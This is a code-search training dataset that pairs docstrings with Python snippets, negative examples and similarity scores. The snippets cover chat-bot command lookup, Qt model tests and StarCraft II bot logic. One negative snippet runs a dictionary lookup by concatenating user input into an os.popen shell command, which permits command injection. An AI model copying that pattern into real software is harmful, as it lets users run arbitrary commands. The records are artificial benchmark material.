\"Pub\", \"Abbr\")\n sources.append(source)\n\n # When\n with qtbot.waitSignals([model.modelAboutToBeReset, model.modelReset]):\n model.update_list(sources)\n\n # Then\n assert model.rowCount() == 1" ]
[ "0.6467967", "0.632745", "0.6217688", "0.6164946", "0.6039418", "0.58916533", "0.5679391", "0.56683993", "0.56465167", "0.5604742", "0.5588091", "0.55784154", "0.55419934", "0.5493708", "0.54824", "0.54641175", "0.5373986", "0.5372224", "0.5364606", "0.5323254", "0.5318951", "0.5297743", "0.5267595", "0.52447224", "0.5230637", "0.5210026", "0.52084947", "0.52052456", "0.51957417", "0.51955324" ]
0.71751255
0
Return the corresponding command for a word
def _word_to_command(word):
    for command in KEYWORDS:
        for w in KEYWORDS[command]:
            if w == word:
                return command
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_action(command):\n return command.split(\" \")[0]", "def get_command(self, kword: str):\n # Step Zero is to make sure that the name does not belong to a REAL command.\n zero, mod = super().get_command(kword)\n if zero:\n return zero, mod\n\n # Otherwise, first, ensure that the keyword does in fact exist in the custom list.\n command = self.config.commands.get(kword, None)\n if not command:\n return None, None\n response = command[\"com\"]\n\n # Build the function to return the response. Note that \"self\" exists already.\n async def cmd_custom(args, src, **_):\n if args:\n member = self.get_member(src, args[0].strip())\n tag = member.mention if member else None\n else:\n tag = None\n\n nsfw = command.get(\"nsfw\", False)\n if nsfw and src.channel.id not in self.config.get(\"nsfwChannels\"):\n return None\n\n # Replace tags where needed.\n try:\n output = response.format(\n self=src.author.name,\n myID=src.author.id,\n tag=tag or src.author.mention,\n )\n except KeyError:\n return None\n else:\n return output\n\n # Specify the docstring and name so that !help will work on this.\n short = response.replace(\"{\", \"{{\").replace(\"}\", \"}}\")\n if len(short) > 80:\n short = short[:77] + \"...\"\n cmd_custom.__doc__ = (\n \"__Custom command__: Return the following text: ```{}```\\n\\n\".format(short)\n + command.get(\n \"desc\",\n \"This is a custom command, so available help text is limited, but at the same time, the command is very simple. All it does is return a string, although the string may include formatting tags for invoker name, invoker ID, and a targeted mention.\",\n )\n + \"\\n\\nSyntax: `{p}\"\n + kword.lower()\n + (\" <user_ID>\" if \"{tag}\" in response else \"\")\n + \"`\"\n )\n cmd_custom.__name__ = \"cmd_\" + kword.lower()\n\n return cmd_custom, None", "def get_word():\n return ' '.join(sys.argv[1:])", "def get_key(command):\n return command.split(\" \")[1]", "def choose_word():\n pass", "def get_command(robot_name):\n\n prompt = ''+robot_name+': What must I do next? 
'\n command = input(prompt)\n while len(command) == 0 or not valid_command(command):\n output(robot_name, \"Sorry, I did not understand '\"+command+\"'.\")\n command = input(prompt)\n\n return command.lower()", "def _func_named(self, arg):\n result = None\n target = 'do_' + arg\n if target in dir(self):\n result = target\n else:\n if self.abbrev: # accept shortened versions of commands\n funcs = [func for func in self.keywords if func.startswith(arg) and func not in self.multilineCommands]\n if len(funcs) == 1:\n result = 'do_' + funcs[0]\n return result", "def bot_ce(mess, nick, botCmd):\n path = \"/usr/bin/\"\n \"\"\"Look up word in dict via sdcv\"\"\"\n if (len(botCmd) == 1):\n message = u\"/me says:“Please type in format: ‘!d word’”\"\n else:\n word = botCmd[1]\n cmd = path + \"sdcv --utf8-output --utf8-input -n '\" + word +\"'\"\n result = os.popen(cmd.encode(\"UTF-8\"), \"r\").read()\n if result:\n if result.count('-->') > 1:\n # firstArrowPosition = result.find('-->')\n # secondArrowPosition = result.find('-->', firstArrowPosition + 3)\n # result = result[:secondArrowPosition]\n message = '/me says:\\n' + result\n else:\n message = self.optFail(u\"Word not found.\")\n return message", "def getCommand(self, name):\n return self.commands[name]()", "def get_cmd(self, command):\n return self.commands[command][\"cmd\"]", "def _get_command(self, message, db_session):\n first_word = self.ts.get_human_readable_message(message).split(' ')[0]\n if len(first_word) > 1 and first_word[0] == '!':\n potential_command = first_word[1:].lower()\n else:\n return None\n if potential_command in self.sorted_methods['for_all']:\n return [potential_command, 'for_all']\n if potential_command in self.sorted_methods['for_mods']:\n return [potential_command, 'for_mods']\n db_result = db_session.query(db.Command).filter(db.Command.call == potential_command).all()\n if db_result:\n return [potential_command, db_result[0]]\n return None", "def _getCommand(self, cmd):\n try:\n cmd_str = cmd.decode('utf-8')\n return getattr(self, 'do_' + cmd_str, None)\n except:\n return None", "def get_command(command):\n for _cmd in commands:\n if _cmd.command == command:\n return _cmd\n raise UserWarning(\"telegram command not found.\")", "def _build_solo_command(self, cmd):\n return COMMAND_CHAR[cmd]", "def get_command(self, ctx, name):\n commands = self._iter_commands()\n return commands[name].load()", "def get_command(self, command_name):\n valid_commands = []\n for existing_command in self._blotish_commands.keys():\n if existing_command.startswith(command_name):\n valid_commands.append(existing_command)\n if len(valid_commands) != 1:\n raise blotish.BlotishError, \"No such command '\" + command_name + \"'\"\n return self._blotish_commands[valid_commands[0]]", "def get_command_with_name(self, command_name):\n return self.commands[command_name]", "def select_cmd():\r\n help_dict = {'1': \"Create LZ, GMA/TPL, \"\r\n \"replace stage files in <ISO path>//stage directory, rebuild ISO\",\r\n '2': \"Create LZ, GMA/TPL, \"\r\n \"replace stage files in <ISO path>//stage directory\",\r\n '3': \"Create LZ, GMA/TPL\",\r\n '4': \"Create .lz.raw\",\r\n '5': \"Compress .lz.raw\",\r\n '6': \"Create LZ\",\r\n '7': \"Create GMA/TPL\",\r\n '8': \"Replace stage files in <ISO path>//stage directory, run GCR\",\r\n '9': \"Rebuild ISO\"\r\n }\r\n\r\n for h_key, h_value in help_dict.items():\r\n print(\"{} ----> {}\".format(h_key, h_value))\r\n\r\n while True:\r\n cmd_input = input(\"\\nEnter command: \")\r\n if cmd_input == \"\":\r\n 
print(\"\\nInvalid command! Try again.\")\r\n\r\n elif cmd_input.lower() not in help_dict.keys():\r\n print(\"\\nInvalid command! Try again.\")\r\n\r\n else:\r\n return cmd_input.lower()", "def cmd(name: str) -> Callable:\n return g.new_cmd_decorator(name, ['c', 'spellCommands',])", "def help_for_command(command):\n help_text = pydoc.text.document(command)\n # remove backspaces\n return re.subn('.\\\\x08', '', help_text)[0]", "def define(word):\n\treturn lexicon.get(word.upper(), \"I couldn't find the definition of {}\\n\".format(word))", "def findCommand(line):\n\n p = re.compile(r\"^!(\\w+)(\\s(.*))?$\")\n m = p.search(line)\n\n if m and m.group(1):\n return m.group(1),m.group(3)\n else: \n return \"\",\"\"", "def extract_command(text):\n return text.split()[0].split('@')[0][1:] if is_command(text) else None", "def extract_command(text):\n return text.split()[0].split('@')[0][1:] if is_command(text) else None", "def analiza(command):\n action, where = None, None\n\n for option in all_actions:\n action_found = search(escape(option), command)\n if action_found:\n action = action_found.group(0)\n break\n\n if 'office1' in command and 'office2' in command:\n where = '1'\n else:\n for place in ['office1', 'office2']:\n where_found = search(place, command)\n if where_found:\n where = (where_found.group(0)).capitalize()\n return action, where", "def _get_command_lookup(self, command_dict):", "def get_command(self,command):\n\t\treturn self.command_handlers[command]", "def translate_command(self, command: str) -> str:\n return self.command_map.get(command, command)", "def get_command(self, ctx, cmd_name):\n cmd_name = self.MAP.get(cmd_name, cmd_name)\n return click.Group.get_command(self, ctx, cmd_name)", "def getWord(self,):\n\t\treturn self.word;" ]
[ "0.70963365", "0.68949115", "0.66989183", "0.6638945", "0.6634957", "0.64863515", "0.6485151", "0.6464957", "0.6424962", "0.6381107", "0.63472664", "0.6344467", "0.6342394", "0.6246106", "0.61938083", "0.6175004", "0.6174016", "0.616791", "0.6157394", "0.6150461", "0.6136199", "0.61267376", "0.6076507", "0.6076507", "0.6064111", "0.60626554", "0.60455173", "0.60372597", "0.6019787", "0.6019785" ]
0.842294
0
Returns time in seconds, assumes the game is played on 'faster'
def time(self) -> float: return self.state.game_loop / 22.4 # / (1/1.4) * (1/16)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n\n return float(time.perf_counter()*1000)", "def currentTimeSecs():\n return time.time()", "def time_elapsed(session, player):\n #TODO (also needs to be added to bot logic)", "def time(self):\n return pygame.time.get_ticks() - self.start_time", "def opponentscaredTime(self, gameState):\n opponents = self.getOpponents(gameState)\n for opponent in opponents:\n if gameState.getAgentState(opponent).scaredTimer > 1:\n return gameState.getAgentState(opponent).scaredTimer\n return None", "def get_time_ms():\n return int(round(time.time() * 1000))", "def GAME_TIME_ADVANCE(dt):", "def get_time_taken_sec(self) -> float:\n return self.time_stop - self.time_start", "def runtime(self):\n return (self.time - self.start).total_seconds()", "def time(self) -> int:\n return int(round(time.time() * 1000))", "def time_ms():\n return int(1000 * time.time())", "def time(n_games, time_per_game):\n\n total_time = n_games * time_per_game / 60\n return total_time", "def time():\n master = MasterTimer.getMasterTimer()\n\n if master.end_time:\n return master.end_time - master.start_time\n else:\n return time.time() - master.start_time", "def get_time(cls):\n now = rospy.Time.now()\n return now.secs + now.nsecs*(10**-9) # time in seconds", "def cpu_time(self):", "def elapsed_time():\r\n elapsed_time, duration = video_time()\r\n return elapsed_time", "def get_time(self) -> float:\n return self.player.time", "def get_time(self) -> float:\n self.rocket.update()\n return self.rocket.time", "def time(self) -> int:\n pass", "def time(self):\n return self._clock() - self._starttime", "def _current_time_seconds(self):\n return int(round(time.time()))", "def get_time(self):\n return self.get_timed() / 10.0", "def time_passed(self):\n return (datetime.now(timezone.utc) - self._time_run).total_seconds()", "def elapsed_time(self):\n # reset timer if game is not started\n if not self.started:\n self.timestamp = None\n return 0\n # sets the first timer\n if self.timestamp is None:\n self.timestamp = time.time()\n return 0\n # if there is a previous timer check elapsed time\n else:\n elapsed_time = time.time() - self.timestamp\n # if elapsed_time is larger than the maximum time, reset timer\n if elapsed_time >= self.max_time:\n self.timestamp = self.max_time\n return elapsed_time" ]
[ "0.7389196", "0.7389196", "0.7389196", "0.7389196", "0.7389196", "0.7389196", "0.73676103", "0.71701133", "0.7106586", "0.7045024", "0.70407975", "0.6973079", "0.696249", "0.6875897", "0.68629414", "0.6855212", "0.68415254", "0.6819904", "0.68141836", "0.67910516", "0.6747411", "0.67355376", "0.67325985", "0.6726998", "0.66871905", "0.6684003", "0.6599663", "0.65990275", "0.65978837", "0.6586945" ]
0.7943959
0
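A quick standalone sketch of the conversion documented in the record above: on "faster" game speed, StarCraft II advances 22.4 game loops per real-time second, so elapsed seconds are just the loop counter divided by 22.4.

LOOPS_PER_SECOND = 22.4  # loops per second on "faster" speed

def loops_to_seconds(game_loop: int) -> float:
    # Convert a raw game-loop counter to elapsed in-game seconds.
    return game_loop / LOOPS_PER_SECOND

print(loops_to_seconds(1344))  # ~60.0, i.e. one in-game minute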
Possible start locations for enemies.
def enemy_start_locations(self) -> List[Point2]: return self._game_info.start_locations
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_start_coords(self, x:int, y:int) -> None:\r\n self.start_x = x\r\n self.start_y = y", "def start_location(self) -> Point2:\n return self._game_info.player_start_location", "def start(self) -> global___Pos:", "def set_locations():\n STATUS['locations']['monster'][0] = generate_random_coord(STATUS['grid_size'])\n STATUS['locations']['monster'][1] = generate_random_coord(STATUS['grid_size'])\n STATUS['locations']['weapon'][0] = generate_random_coord(STATUS['grid_size'])\n STATUS['locations']['weapon'][1] = generate_random_coord(STATUS['grid_size'])", "def init_locations():\n player, door, monster = sample(CELLS, k=3)\n\n return player, door, monster", "def place_entrance(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__current_room = x, y # places adventurer in dungeon at start of game\r\n self.__entrance_room = x, y\r\n self.__maze[x][y].set_entrance(True)", "def set_player_start_position(self):\n if self.field_size.x() == 0: return\n \n parts = len(self.player_list)\n y_list = []\n for p in range(1,parts+1):\n y_list.append(self.field_size.y()*p/(parts+1))\n\n for i,p in enumerate(self.player_list):\n p1 = Qt.QPoint(self.start_y,y_list[i])\n p2 = Qt.QPoint(self.start_y+self.start_length,y_list[i])\n p.set_start_position([p1,p2])\n p.status_remove = False\n p.override_direction(0)", "def _set_start(self, coordinates):\n self._start = coordinates", "def setUp(self):\n self.location = [(0, 0), (0, 1)]\n self.hit = (0, 0)", "def __init__(self, center_loc, tent_loc = Location(0,0)):\n # Andrey Tymofeiuk: This method is written by me\n self.center_loc = center_loc\n self.tent_loc = tent_loc\n MITCampus.tent_collect = []\n MITCampus.tent_collect.append(tent_loc)", "def set_starting_pos(self):\n if self.start and self.is_unoccupied(*self.start):\n self.current_pos = self.start[:]\n else:\n self.set_random_pos('starting')", "def choose_starting_points(self, agent):\n # Left Side\n if agent % 4 == 1:\n if self.left_side[\"x_max\"] != self.left_side[\"x_min\"]:\n x = (self.left_side[\"x_max\"] + self.left_side[\"x_min\"])/2\n else:\n x = self.left_side[\"x_max\"]\n if self.left_side[\"y_max\"] != self.left_side[\"y_min\"]:\n y = (self.left_side[\"y_max\"] + self.left_side[\"y_min\"])/2\n else:\n y = self.left_side[\"y_max\"]\n # Right Side\n elif agent % 4 == 2:\n if self.right_side[\"x_max\"] != self.right_side[\"x_min\"]:\n x = (self.right_side[\"x_max\"] + self.right_side[\"x_min\"])/2\n else:\n x = self.right_side[\"x_max\"]\n if self.right_side[\"y_max\"] != self.right_side[\"y_min\"]:\n y = (self.right_side[\"y_max\"] + self.right_side[\"y_min\"])/2\n else:\n y = self.right_side[\"y_max\"]\n # Top\n elif agent % 4 == 3:\n if self.top[\"x_max\"] != self.top[\"x_min\"]:\n x = (self.top[\"x_max\"] + self.top[\"x_min\"])/2\n else:\n x = self.top[\"x_max\"]\n if self.top[\"y_max\"] != self.top[\"y_min\"]:\n y = (self.top[\"y_max\"] + self.top[\"y_min\"])/2\n else:\n y = self.top[\"y_max\"]\n # Bottom\n elif agent % 4 == 0:\n if self.bottom[\"x_max\"] != self.bottom[\"x_min\"]:\n x = (self.bottom[\"x_max\"] + self.bottom[\"x_min\"])/2\n else:\n x = self.bottom[\"x_max\"]\n if self.bottom[\"y_max\"] != self.bottom[\"y_min\"]:\n y = (self.bottom[\"y_max\"] + self.bottom[\"y_min\"])/2\n else:\n y = self.bottom[\"y_max\"]\n else:\n raise ValueError(\"Invalid number for sides!\")\n\n return x, y", "def spawn_enemies():\n\n enemy_num = random.randint(1,5)\n spawn_box = spawn_boxes[random.randint(0, 3)]\n\n if spawn_box.y <= 0: start = [0, 
128]\n elif spawn_box.y >= 640: start = [0, -128]\n elif spawn_box.x <= 0: start = [128, 0]\n elif spawn_box.x >= 640: start = [-128, 0]\n\n x = spawn_box.x\n y = spawn_box.y\n new_enemies = []\n for i in range(enemy_num):\n new_enemies.append(enemies.Wolf(x + 32, y + 32, grid, (x + 32 + start[0], y + 32 + start[1])))\n x += 64\n if not spawn_box.collidepoint(x, y):\n x = spawn_box.x\n y += 64\n\n all_enemies.add(new_enemies)\n all_sprites.add(new_enemies)", "def create_enemies_list(self):\n import random\n random.seed()\n enemies = [\"Assets/images/Inimigo_1_verde.png\", \"Assets/images/Inimigo_1_verm.png\", \"Assets/images/Inimigo_2.png\", \"Assets/images/Inimigo_3.png\"]\n start_x, start_y = 10, 25\n x, y = start_x, start_y\n tamanho = min(self.game.count_inimigos, self.running.colunas)\n self.game.count_inimigos += 1\n for j in range(tamanho): \n e_type = random.choice(enemies)\n enemy = Enemy(self.game, x, y, e_type)\n self.running.inimigos.append(enemy)\n self.running.game_images.append(enemy.game_image)\n x += self.running.x_space\n return", "def __init__(self, center, waypoints, firepoints):\n super().__init__(center, MallFighter.MALL_FIGHTER_SPEED, MallFighter.ANIMATION_DELAY, *MallFighter.FILE_PATH)\n self.fire_idx = 0\n self.way_idx = 0\n self.waypoints = waypoints\n self.firepoints = firepoints", "def start(self):\n self.startAngMovementALl()\n self.startMovementAll()", "def __init__(self, center_loc, tent_loc = Location(0,0)):\n self.center_loc = center_loc\n self.tents = []\n self.tents.append(tent_loc)", "def __init__(self, start_x, start_y):\n self.x = start_x\n self.y = start_y\n\n self._dead_end_direction = [[]]\n self._moved = False\n self._junction_index = [1]\n\n self.path = [[start_x, start_y]]", "def exploring_starts(self):\n def random_choice(l): return l[np.random.randint(len(l))]\n return map(random_choice, (self.env.states, self.env.moves))", "def __init__(self, num_points=5000):\n self.num_points = num_points\n\n # All walks start at (0, 0)\n self.x_values = [0]\n self.y_values = [0]", "def __init__(self, num_points=5000):\n self.num_points = num_points\n\n # All walks start at (0, 0)\n self.x_values = [0]\n self.y_values = [0]", "def get_spawns(world):\r\n my_start = world.get_friendly_nest_positions()[0]\r\n their_start = world.get_enemy_nest_positions()[0]\r\n\r\n return my_start, their_start, len(world.get_shortest_path(my_start, their_start, None))", "def _hit_start_set(self, value):\n self._hit_start = self._prep_coord(value, \"hit_end\", le)", "def __init__(self, name, agent, all_locations):\n super().__init__(name)\n self.agent = agent\n self.world = agent.world\n self.all_locations = all_locations\n self.location_feat = get_location_key(agent)", "def getStartState(self):\n \"\"\" A state space can be the start coordinates and a list to hold visited corners\"\"\"\n return (self.startingPosition, [])\n # util.raiseNotDefined()", "def startMovementAll(self):\n self.startMovementX()\n self.startMovementY()\n self.startMovementZ()", "def calculate_screen_position(self):\r\n\r\n character_select_start_y = 604\r\n character_select_end_y = 646\r\n\r\n if self.slotNumber <= 6:\r\n start_y = 585 # 595\r\n end_y = 627 # 637\r\n x_hero_number = self.slotNumber\r\n else:\r\n start_y = 300 # 290\r\n end_y = 342 # 332\r\n x_hero_number = self.slotNumber - 6\r\n\r\n start_x = 249 + (x_hero_number * 192)\r\n end_x = 326 + (x_hero_number * 192)\r\n\r\n self.screenPositionCharacterSelect = {\r\n \"start_x\": start_x,\r\n \"end_x\": end_x,\r\n \"start_y\": 
character_select_start_y,\r\n \"end_y\": character_select_end_y\r\n }\r\n self.screenPositionTab = {\r\n \"start_x\": start_x,\r\n \"end_x\": end_x,\r\n \"start_y\": start_y,\r\n \"end_y\": end_y\r\n }", "def start_loc(self) -> str:\n return self._start_loc", "def get_enemy_gun(self):\n return [(self.rect.x + x_pos, self.rect.y + y_pos) for x_pos, y_pos in MallFighter.GUN_POS_OFFSETS]", "def _prepare_first_step(self):\n if self.townhalls:\n self._game_info.player_start_location = self.townhalls.first.position\n self._game_info.map_ramps, self._game_info.vision_blockers = self._game_info._find_ramps_and_vision_blockers()" ]
[ "0.615017", "0.61056244", "0.6083833", "0.57885003", "0.5781765", "0.5773303", "0.5729508", "0.5711662", "0.56731534", "0.5590496", "0.5586484", "0.5582612", "0.55793685", "0.5547637", "0.552948", "0.5490197", "0.5463405", "0.5449208", "0.54371756", "0.54257303", "0.54257303", "0.53848076", "0.5378839", "0.5348591", "0.5338669", "0.5310377", "0.52950704", "0.5290277", "0.5290005", "0.527351" ]
0.8132698
0
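An illustrative use of the property in the record above, assuming the python-sc2 BotAI API these records appear to be drawn from: send one worker to scout the first candidate enemy spawn.

from sc2.bot_ai import BotAI

class ScoutBot(BotAI):
    async def on_step(self, iteration: int):
        # On the first step, scout the first possible enemy start location.
        if iteration == 0 and self.workers:
            self.workers.random.move(self.enemy_start_locations[0])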
Returns available abilities of one or more units. Right now only checks cooldown, energy cost, and whether the ability has been researched.
async def get_available_abilities( self, units: Union[List[Unit], Units], ignore_resource_requirements: bool = False ) -> List[List[AbilityId]]: return await self._client.query_available_abilities(units, ignore_resource_requirements)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def capabilities(self, abilities):\n capabilities = []\n for ability in abilities:\n if self.privileged_to_run(ability) and ability.find_executors(self.executors, self.platform):\n capabilities.append(ability)\n return capabilities", "def _abilities_all_units(self) -> Counter:\n abilities_amount = Counter()\n for unit in self.units + self.structures: # type: Unit\n for order in unit.orders:\n abilities_amount[order.ability] += 1\n if not unit.is_ready:\n if self.race != Race.Terran or not unit.is_structure:\n # If an SCV is constructing a building, already_pending would count this structure twice\n # (once from the SCV order, and once from \"not structure.is_ready\")\n abilities_amount[self._game_data.units[unit.type_id.value].creation_ability] += 1\n\n return abilities_amount", "def __add_expanded_abilities(self, name):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n abilities = loop.run_until_complete(self.api.process_requests(\n \"ability\", name))\n ability_list = []\n factory = PokemonAbilityFactory(abilities, True)\n for ability in factory.create():\n ability_list.append(ability)\n return ability_list", "def test_models_organization_get_abilities_administrator(self):\n access = factories.UserOrganizationAccessFactory(role=\"administrator\")\n abilities = access.organization.get_abilities(access.user)\n self.assertEqual(\n abilities,\n {\n \"delete\": False,\n \"get\": True,\n \"patch\": True,\n \"put\": True,\n \"manage_accesses\": True,\n },\n )", "def units_which_can_be_built(self):\n what_can_be_built = [Pikeman.kind]\n player = self.player\n if player.age in ('bronze age', 'iron age'):\n shields = BronzeShields\n swords = BronzeSwords\n if all(s.name in player.things_researched for s in (shields, swords)):\n what_can_be_built.append(Swordsman.kind)\n return what_can_be_built", "def testabilities(self):\n for ability in WeaponAbility.typelist:\n a = WeaponAbility(ability)\n self.assert_(ability in str(a))\n self.assertTrue(isinstance(a.AC, int))\n self.assertTrue(isinstance(a.description(), str))", "def getAllPossibleMeleeAttacks(self):\n\t\traise NotImplementedError(\"Base abstract class Individual\")", "def abilities_all_types():\r\n\r\n ability_mods = abilities_gen_mods()\r\n\r\n with patch(\"funclg.utils.data_mgmt.id_gen\", side_effect=ability_ids()):\r\n all_abilities = []\r\n for index, a_type in enumerate(ABILITY_TYPES):\r\n\r\n all_abilities.append(\r\n Abilities(\r\n name=f\"Ability_{index}\",\r\n ability_type=a_type,\r\n description=f\"{a_type} ability\",\r\n mod=ability_mods[a_type],\r\n )\r\n )\r\n\r\n all_abilities.append(\r\n Abilities(\r\n name=\"Ability_Error_NoMod\",\r\n ability_type=\"Error\",\r\n description=\"Error ability\",\r\n )\r\n )\r\n return all_abilities", "def test_models_organization_get_abilities_member_user(self):\n access = factories.UserOrganizationAccessFactory(role=\"member\")\n\n with self.assertNumQueries(1):\n abilities = access.organization.get_abilities(access.user)\n\n self.assertEqual(\n abilities,\n {\n \"delete\": False,\n \"get\": True,\n \"patch\": False,\n \"put\": False,\n \"manage_accesses\": False,\n },\n )", "def _get_legal_actions(self):\n return self.game.get_legal_actions()", "def get_active_units(self):\n alive_units = self.get_alive_units()\n active_units = []\n for alive_unit in alive_units:\n if not alive_unit.ready_to_attack():\n continue\n active_units.append(alive_unit)\n return active_units", "def find_ability(abilities: list, character_class: str, attack_type: str) -> Dict:\n # Find the 
ability to use\n ability_to_use = {\"effects\": [], \"enhancements\": []}\n for ability in abilities:\n if (ability[\"class\"] == character_class) and (ability[\"type\"] == attack_type):\n ability_to_use = ability\n break\n\n return ability_to_use", "def get_available_actions(self):\n actions = [self.ACTIONS_INDEXES['IDLE']]\n\n # Shall we also restrict LEFT & RIGHT actions ?\n\n if self.spacecraft.velocity_index < self.spacecraft.SPEED_COUNT - 1:\n actions.append(self.ACTIONS_INDEXES['FASTER'])\n if self.spacecraft.velocity_index > 0:\n actions.append(self.ACTIONS_INDEXES['SLOWER'])\n return actions", "def get_missions(): # noqa: E501\n return 'do some magic!'", "def test_models_organization_get_abilities_preset_role(self):\n access = factories.UserOrganizationAccessFactory(role=\"member\")\n access.organization.user_role = \"member\"\n\n with self.assertNumQueries(0):\n abilities = access.organization.get_abilities(access.user)\n\n self.assertEqual(\n abilities,\n {\n \"delete\": False,\n \"get\": True,\n \"patch\": False,\n \"put\": False,\n \"manage_accesses\": False,\n },\n )", "def testabilities(self):\n for ability in AmuletAbility.typelist:\n a = AmuletAbility(ability)\n self.assertEqual(a.type, ability)\n if ability != 'Attribute':\n self.assert_(ability in str(a))\n self.assertTrue(isinstance(a.AC, int))\n self.assertTrue(isinstance(a.description(), str))", "def retrieve_handcrafted_inputs(self, obs):\n self.detect_self_unit_types(obs)\n\n feature_units = obs.observation.feature_units\n allies = [unit for unit in feature_units if unit.alliance == _PLAYER_SELF]\n selected_allies = [unit for unit in allies if unit.unit_type == self.current_group_id]\n enemies = [unit for unit in feature_units if unit.alliance == _PLAYER_ENEMY]\n\n hitpoints = 0\n for unit in selected_allies:\n hitpoints += unit.health\n\n if self.current_group_id in unit_health.keys():\n init_hp = 0\n init_hp = unit_health[self.current_group_id] * self.init_unit_counts[self.current_group_id]\n else:\n init_hp = self.initial_self_hit_points\n current_hp = hitpoints / init_hp\n\n weapon_cooldown = 0\n for ally in selected_allies:\n if ally.weapon_cooldown > 0:\n weapon_cooldown += 1\n if weapon_cooldown > (len(selected_allies) / 2):\n # nn input weapon cooldown = 1 means the majority cannot fire\n weapon_cooldown = 1\n else:\n weapon_cooldown = 0\n\n self_weapon_range = 5\n self_radius = 1\n self_unit_type = 1\n self_speed = 1\n if len(selected_allies) > 0:\n self_weapon_range = weapon_ranges[self.current_group_id]\n self_radius = unit_sizes[self.current_group_id] / float(2)\n self_unit_type = unit_type[self.current_group_id]\n self_speed = unit_speed[self.current_group_id]\n\n enemy_radius = 1\n enemy_weapon_range = 1\n enemy_unit_type = 0\n enemy_speed = 1\n if len(enemies) > 0:\n self.enemy_id = enemies[0].unit_type\n enemy_weapon_range = weapon_ranges[self.enemy_id]\n enemy_radius = unit_sizes[self.enemy_id] / float(2)\n enemy_unit_type = unit_type[self.enemy_id]\n enemy_speed = unit_speed[self.enemy_id]\n\n # TODO can be inaccurate if using melee units\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_avg_location_of_self_subgroup(obs)) < (\n self_radius + self_weapon_range + enemy_radius):\n enemy_in_range = 1\n else:\n enemy_in_range = 0\n\n in_enemy_range = 0\n for ally in selected_allies:\n for enemy in enemies:\n if self.retrieve_distance_between_positions([enemy.x, enemy.y], [ally.x, ally.y]) < (\n self_radius + enemy_weapon_range + enemy_radius):\n in_enemy_range 
= 1\n break\n else:\n in_enemy_range = 0\n if in_enemy_range:\n break\n\n north_bound, south_bound, west_bound, east_bound = self.calculate_distance_to_bounds(obs, for_subgroup=True)\n\n if self.previous_commands[self.current_group_id] == \"FIGHT\":\n prev_cmd = 1\n elif self.previous_commands[self.current_group_id] == \"FLEE\":\n prev_cmd = 0\n\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence = self.detect_enemies_by_region(obs,\n for_subgroup=True)\n\n distance_to_enemy = self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_avg_location_of_self_subgroup(obs))\n distance_to_enemy = distance_to_enemy / float((32 ** 2 + 20 ** 2) ** 0.5)\n\n return [current_hp, weapon_cooldown, enemy_in_range, in_enemy_range, prev_cmd, north_bound, south_bound,\n west_bound, east_bound,\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence, self_unit_type,\n enemy_unit_type, self_weapon_range, enemy_weapon_range, self_speed, enemy_speed, distance_to_enemy]", "def possible_rooms(self):\r\n return self.rooms", "def retrieve_handcrafted_inputs(self, obs):\n feature_units = obs.observation.feature_units\n allies = [unit for unit in feature_units if unit.alliance == _PLAYER_SELF]\n enemies = [unit for unit in feature_units if unit.alliance == _PLAYER_ENEMY]\n\n current_hp = self.calculate_hitpoints(feature_units, _PLAYER_SELF)\n current_hp = current_hp / self.initial_self_hit_points\n\n weapon_cooldown = 0\n for ally in allies:\n if ally.weapon_cooldown > 0:\n weapon_cooldown += 1\n if weapon_cooldown > (len(allies) / 2):\n # nn input weapon cooldown = 1 means the majority cannot fire\n weapon_cooldown = 1\n else:\n weapon_cooldown = 0\n\n self_weapon_range = 5\n self_radius = 1\n self_unit_type = 1\n if len(allies) > 0:\n self_weapon_range = weapon_ranges[allies[0].unit_type]\n self_radius = unit_sizes[allies[0].unit_type] / float(2)\n self_unit_type = unit_type[allies[0].unit_type]\n\n enemy_radius = 1\n enemy_weapon_range = 1\n enemy_unit_type = 0\n if len(enemies) > 0:\n enemy_weapon_range = weapon_ranges[enemies[0].unit_type]\n enemy_radius = unit_sizes[enemies[0].unit_type] / float(2)\n enemy_unit_type = unit_type[enemies[0].unit_type]\n\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_current_location(obs)) < (\n self_radius + self_weapon_range + enemy_radius):\n enemy_in_range = 1\n else:\n enemy_in_range = 0\n\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_current_location(obs)) < (\n self_radius + enemy_weapon_range + enemy_radius):\n in_enemy_range = 1\n else:\n in_enemy_range = 0\n\n north_bound, south_bound, west_bound, east_bound = self.calculate_distance_to_bounds(obs)\n\n if self.previous_command == \"FIGHT\":\n prev_cmd = 1\n elif self.previous_command == \"FLEE\":\n prev_cmd = 0\n\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence = self.detect_enemies_by_region(obs)\n\n return [current_hp, weapon_cooldown, enemy_in_range, in_enemy_range, prev_cmd, north_bound, south_bound,\n west_bound, east_bound,\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence, self_unit_type,\n enemy_unit_type]", "def availability(self) -> list:\n availability = self._availability\n return availability", "def amenities(self):\n G, mapping = self.network()\n waste = []\n resources = []\n intmed_products = []\n\n for nd in G:\n # if nd[0] != \"r\":\n if not isinstance(nd, int):\n if not 
